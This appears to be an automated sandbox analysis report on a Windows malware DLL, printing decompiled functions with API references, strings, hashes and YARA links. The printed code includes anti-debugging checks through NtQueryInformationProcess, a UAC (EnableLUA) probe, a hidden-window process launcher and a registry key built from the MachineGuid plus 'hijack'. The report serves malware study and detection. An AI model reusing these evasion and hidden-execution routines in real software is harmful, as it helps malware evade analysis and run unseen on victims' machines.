Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5

GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
_sprintf.LIBCMT ref: 1001FF47

Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
Part of subcall function 1001A1D0: CreateProcessA.KERNEL32 ref: 1001A22B
Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243

Strings

%s%s %s %s, xrefs: 1001FF3B
0011, xrefs: 1001FF26

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
String ID: %s%s %s %s$0011
API String ID: 3552933064-2132516514
Opcode ID: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
Instruction ID: 6384a0b866657e4047376afeeb64c65eb3b3c0e3c567da3335d1d9c995957fc0
Opcode Fuzzy Hash: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
Instruction Fuzzy Hash: 7911B6B6C00248ABE714EB90DC96FDD7778EB04750F4041A4FA19661C1EB747B48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001A1D0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A1D0(void* __eflags, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				CHAR* _v24;
				struct _STARTUPINFOA _v100;
				void* _t27;

				_v24 = 0;
				E1000CF20(_t27,  &_v100, 0, 0x44);
				_v100.cb = 0x44;
				_v100.dwFlags = 1;
				_v100.wShowWindow = 0;
				E1000CF20(_t27,  &_v20, 0, 0x10);
				if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20) != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					_v24 = 1;
				}
				return _v24;
			}

0x1001a1d6
0x1001a1e5
0x1001a1ed
0x1001a1f4
0x1001a1fb
0x1001a209
0x1001a233
0x1001a239
0x1001a243
0x1001a249
0x1001a249
0x1001a256

APIs

_memset.LIBCMT ref: 1001A1E5
_memset.LIBCMT ref: 1001A209
CreateProcessA.KERNEL32 ref: 1001A22B
CloseHandle.KERNEL32(?), ref: 1001A239
CloseHandle.KERNEL32(?), ref: 1001A243

Strings

D, xrefs: 1001A1ED

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandle_memset$CreateProcess
String ID: D
API String ID: 1151464618-2746444292
Opcode ID: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
Opcode Fuzzy Hash: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001AEB0, Relevance: 8.9, APIs: 7, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AEB0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _t105;
				void* _t174;
				void* _t176;

				_t172 = __edi;
				_t122 = __ebx;
				_v16 = _a4;
				_t4 = _v16 + 4; // 0x7d83ec45
				_v24 =  *_t4;
				_v12 = 0;
				_v20 =  *_v16 + 0x78;
				if( *((intOrPtr*)(_v20 + 4)) != 0) {
					_v8 = _v24 +  *_v20;
					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							if( *(_v8 + 0x18) != 0) {
								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
									L19:
									_t70 = _v16 + 0x30; // 0x51e84d8b
									_v28 = E1000DF58(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AA60);
									if(_v28 != 0) {
										_v12 =  *(_v28 + 4) & 0x0000ffff;
										L22:
										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
										}
										SetLastError(0x7f);
										return 0;
									}
									SetLastError(0x7f);
									return 0;
								}
								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
								_t105 = L1000CE56(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
								_t176 = _t174 + 4;
								_v44 = _t105;
								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
								if(_v44 != 0) {
									_v32 = 0;
									while(_v32 <  *(_v8 + 0x18)) {
										 *_v44 = _v24 +  *_v36;
										 *((short*)(_v44 + 4)) =  *_v40;
										_v32 = _v32 + 1;
										_v36 = _v36 + 4;
										_v40 = _v40 + 2;
										_v44 = _v44 + 8;
									}
									_t66 = _v16 + 0x30; // 0x51e84d8b
									E1000D9D0( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AA90);
									_t174 = _t176 + 0x10;
									goto L19;
								}
								SetLastError(0xe);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L22;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}

0x1001aeb0
0x1001aeb0
0x1001aeb9
0x1001aebf
0x1001aec2
0x1001aec5
0x1001aed4
0x1001aede
0x1001aef7
0x1001af01
0x1001af0e
0x00000000
0x1001af1b
0x1001af26
0x1001af6a
0x1001af87
0x1001b049
0x1001b05a
0x1001b06a
0x1001b071
0x1001b086
0x1001b089
0x1001b092
0x00000000
0x1001b0b2
0x1001b096
0x00000000
0x1001b09c
0x1001b075
0x00000000
0x1001b07b
0x1001af96
0x1001afa2
0x1001afaf
0x1001afb4
0x1001afb7
0x1001afc0
0x1001afc7
0x1001afd8
0x1001b005
0x1001b01b
0x1001b026
0x1001afe7
0x1001aff0
0x1001aff9
0x1001b002
0x1001b002
0x1001b03d
0x1001b041
0x1001b046
0x00000000
0x1001b046
0x1001afcb
0x00000000
0x1001afd1
0x1001af6e
0x00000000
0x1001af74
0x1001af39
0x1001af5b
0x00000000
0x1001af5b
0x1001af3d
0x00000000
0x1001af43
0x1001af01
0x1001aee2
0x00000000

APIs

SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AEE2
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AF0E

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
Instruction ID: 0b553024b132d835b53bcc3061d3cd906e00f9f3519ff007c74d2c873b7cba87
Opcode Fuzzy Hash: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
Instruction Fuzzy Hash: A071D274A00249EFDB04CF94C994AAEB7F1FF48304F618199E915AB341D735EE81CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001FDC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022ADF);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A1D0(_t50,  &_v312);
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}

0x1001fdc0
0x1001fdc0
0x1001fdc3
0x1001fdc5
0x1001fdd0
0x1001fdd1
0x1001fdde
0x1001fde5
0x1001fdfa
0x1001fe02
0x1001fe17
0x1001fe23
0x1001fe37
0x1001fe45
0x1001fe4e
0x1001fe62
0x1001fe71
0x1001fe7c
0x1001fe81
0x1001fe8b
0x1001fe93
0x1001fe9d

APIs

_memset.LIBCMT ref: 1001FDFA
_memset.LIBCMT ref: 1001FE17

Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5

GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
_sprintf.LIBCMT ref: 1001FE62

Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
Part of subcall function 1001A1D0: CreateProcessA.KERNEL32 ref: 1001A22B
Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243

Strings

%s%s 200 %s, xrefs: 1001FE56

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
String ID: %s%s 200 %s
API String ID: 3552933064-2772210913
Opcode ID: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
Instruction ID: fa445e4306be4de550b1f58f9f77f959fb08a7f600bfac00d2f80f5c48e4b5e6
Opcode Fuzzy Hash: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
Instruction Fuzzy Hash: B01198B6C00208ABE714EB90DC56FDE777CEB14750F4441A4F615A61C5EB747B88CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001F990, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF20(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A2F0( &_v276,  &_v12);
				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA30(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}

0x1001f990
0x1001f990
0x1001f999
0x1001f9ae
0x1001f9b6
0x1001f9c8
0x1001f9e1
0x1001f9f8
0x1001fa08
0x1001fa10
0x1001fa14
0x1001fa19
0x00000000
0x1001fa1f
0x1001fa25

APIs

_memset.LIBCMT ref: 1001F9AE

Part of subcall function 1001A2F0: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319

_strcat_s.LIBCMT ref: 1001F9E1

Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6

_sprintf.LIBCMT ref: 1001FA08

Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9

Strings

SOFTWARE\Microsoft\%s, xrefs: 1001F9FF
hijack, xrefs: 1001F9D0

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
String ID: SOFTWARE\Microsoft\%s$hijack
API String ID: 3138967372-3622423033
Opcode ID: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
Opcode Fuzzy Hash: ada38b5ab26f5dc62f486429ffaac0b96da48a560580f8f5e3c1f71cb78a86e2
Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1001D240, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001D240() {
				void* _v8;
				int _v12;
				signed int _v16;
				int _v20;
				char _v24;

				_v12 = 4;
				_v20 = 4;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8) == 0) {
					if(RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20) == 0) {
						_v16 = 0 | _v24 == 0x00000001;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x1001d246
0x1001d24d
0x1001d254
0x1001d25b
0x1001d262
0x1001d286
0x1001d2a7
0x1001d2b2
0x1001d2b2
0x1001d2b9
0x1001d2b9
0x1001d2c5

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D274
EnableLUA, xrefs: 1001D296

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
API String ID: 3677997916-2194944742
Opcode ID: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
Instruction ID: 5282c0b80e2e5c01901b155bdceaa9b4f75acfd53aa6edd49772c4382101ddc9
Opcode Fuzzy Hash: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
Instruction Fuzzy Hash: EC01FFB5D00219FBEB04DFD1CD98BEEBBB8EB44305F108059E611BA280D7B59B04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001A2F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A2F0(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;

				_v12 = 0;
				_v8 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8) == 0) {
					if(RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8) == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					return _v12;
				}
				return 0;
			}

0x1001a2f6
0x1001a2fd
0x1001a321
0x1001a344
0x1001a34a
0x1001a34a
0x1001a355
0x00000000
0x1001a35b
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
RegQueryValueExA.ADVAPI32(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
RegCloseKey.ADVAPI32(00000000), ref: 1001A355

Strings

Software\Microsoft\Cryptography, xrefs: 1001A30F
MachineGuid, xrefs: 1001A333

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: MachineGuid$Software\Microsoft\Cryptography
API String ID: 3677997916-880526231
Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765

Uniqueness

Uniqueness Score: -1.00%

Function 10013389, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E10013389(void* __ebx, void* __esi) {
				void* _t1;
				long _t5;
				void* _t9;
				void* _t11;
				void* _t15;

				_t9 = __ebx;
				_t1 = TlsGetValue( *0x10332c6c);
				_t16 = _t1;
				if(_t1 != 0) {
					_push( *0x10332c68);
					_t11 =  *(TlsGetValue( *0x10332c6c))();
				}
				_pop(_t15);
				_push(0);
				_push( *0x10332c68);
				 *((intOrPtr*)(E10013034( *0x10333820)))();
				_push(_t11);
				L10013256(_t9, _t11, _t15, _t16);
				_t5 =  *0x10332c6c; // 0x24
				if(_t5 != 0xffffffff) {
					return TlsSetValue(_t5, 0);
				}
				return _t5;
			}

0x10013389
0x10013396
0x10013398
0x1001339a
0x1001339c
0x100133ac
0x100133ac
0x100133ae
0x100133af
0x100133b1
0x100133c3
0x100133c5
0x100133c6
0x100133cc
0x100133d4
0x00000000
0x100133d9
0x100133df

APIs

TlsGetValue.KERNEL32 ref: 10013396
TlsGetValue.KERNEL32 ref: 100133A8
__decode_pointer.LIBCMT ref: 100133BD
TlsSetValue.KERNEL32(00000024,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240,0000000C,1000EBE7), ref: 100133D9

Strings

tj, xrefs: 100133D4

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Value$__decode_pointer
String ID: tj
API String ID: 3389472636-3491506833
Opcode ID: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
Instruction ID: a5e655cd75536ae3ffa2bd70bd2a424c71ddb38a18ae7223bb1ec647065a0f02
Opcode Fuzzy Hash: 98b685037422a500dab51c28cbe3472850961789b495b2f1d75dbfea88fe638a
Instruction Fuzzy Hash: CDE06D31500120AEDA12A768DCC4B5D3FAAFB84260F249111F418DE1B1CF31DE96DA54

Uniqueness

Uniqueness Score: -1.00%

Function 10019F00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10019F00() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 1;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000001;
			}

0x10019f06
0x10019f18
0x10019f2a
0x10019f3e
0x10019f4d

APIs

LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37

Strings

Ntdll.dll, xrefs: 10019F0D
NtQueryInformationProcess, xrefs: 10019F1B

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressCurrentLibraryLoadProcProcess
String ID: NtQueryInformationProcess$Ntdll.dll
API String ID: 353374858-801751246
Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10019F50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10019F50() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}

0x10019f56
0x10019f68
0x10019f7a
0x10019f8e
0x10019f9d

APIs

LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87

Strings

Ntdll.dll, xrefs: 10019F5D
NtQueryInformationProcess, xrefs: 10019F6B

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressCurrentLibraryLoadProcProcess
String ID: NtQueryInformationProcess$Ntdll.dll
API String ID: 353374858-801751246
Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65

Uniqueness

Uniqueness Score: -1.00%

Function 10019FA0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10019FA0() {
				char _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				_v12(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}

0x10019fa6
0x10019fb8
0x10019fca
0x10019fde
0x10019fed

APIs

LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7

Strings

Ntdll.dll, xrefs: 10019FAD
NtQueryInformationProcess, xrefs: 10019FBB

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressCurrentLibraryLoadProcProcess
String ID: NtQueryInformationProcess$Ntdll.dll
API String ID: 353374858-801751246
Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
